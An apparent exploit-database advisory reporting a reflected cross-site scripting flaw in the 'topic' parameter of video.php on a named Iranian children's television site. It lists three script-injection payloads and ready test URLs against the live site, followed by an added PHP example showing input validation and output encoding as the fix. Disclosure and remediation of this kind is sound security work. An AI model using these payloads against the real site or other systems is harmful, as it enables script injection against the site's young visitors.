Hodhodfarsi.tv - Cross-site scripting (XSS)

2018.11.14
kodak (IR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Hodhodfarsi.tv - Cross-site scripting (XSS)
# Exploit Author: kodak
# Date: 2018-11-14
# Vendor Homepage: http://www.hodhodfarsi.tv/
# Category : webapps
# Tested on: Windows and Linux
# CVE: CWE-79

1. Description:
====================
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

*** Hod hod farsi is an Iranian television channel for children and teenagers ***

2. Exploit/POC:
====================
Vulnerable file : http://hodhodfarsi.tv/video.php
Parameter: topic (GET)
Vulnerability : Reflected XSS
Location : /video.php

Payloads :
topic=1"><script>alert("Kodak")</script>
Or
topic=1"/><svg/onload=prompt("Beh")>
Or
topic=1"><iframe/src=javascript:confirm("PRDS")>IR

Testing:
http://hodhodfarsi.tv/video.php?topic=1"><script>alert("XSS")</script>
http://hodhodfarsi.tv/video.php?topic=1"/><svg/onload=prompt("XSS")>

3. Screenshot
====================
https://imgur.com/a/AHxGtqF
-------------------------------
#Thanks to PARDIS:)
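The fix for this class of bug, as an added example that is not part of the original advisory and not the site's real code: every payload above starts with `1">`, which is consistent with `topic` being reflected unencoded inside a double-quoted HTML attribute. The function names and markup are hypothetical, and the example assumes `topic` is a numeric ID and PHP 8 or later.

```php
<?php
declare(strict_types=1);

// BEFORE (hypothetical pattern, not the real video.php): the raw GET value is
// concatenated into a double-quoted attribute, so a `"` in the value closes
// the attribute and `>` closes the tag. Shown for contrast only, never called.
function render_link_vulnerable(string $topic): string
{
    return '<a href="video.php?topic=' . $topic . '">Next</a>';
}

// AFTER, step 1: validate the input type. Assumption: topic is a numeric ID,
// so anything that is not 1-9 ASCII digits is rejected before any rendering.
function parse_topic(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// AFTER, step 2: encode for the output context (an HTML attribute) even though
// the value is already validated, so a later change to validation cannot
// reintroduce the injection. ENT_QUOTES encodes both " and '.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_link_hardened(int $topic): string
{
    $href = 'video.php?topic=' . rawurlencode((string) $topic);
    return '<a href="' . attr($href) . '">Next</a>';
}

// Constructed inputs: one valid ID plus two values taken from the advisory.
// In a real handler this would be $_GET['topic'] ?? null.
$samples = ['1', '1"><script>alert("XSS")</script>', '1"/><svg/onload=prompt("XSS")>'];
foreach ($samples as $raw) {
    $topic = parse_topic($raw);
    if ($topic === null) {
        // A real handler would send HTTP 400 here; if the rejected value is
        // echoed back at all, it goes through attr() first.
        echo 'rejected topic: ' . attr($raw) . PHP_EOL;
        continue;
    }
    echo render_link_hardened($topic) . PHP_EOL;
}
```

Run with `php` on the command line: the numeric value yields a link, and both advisory values are rejected and printed with `"`, `<` and `>` converted to entities.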

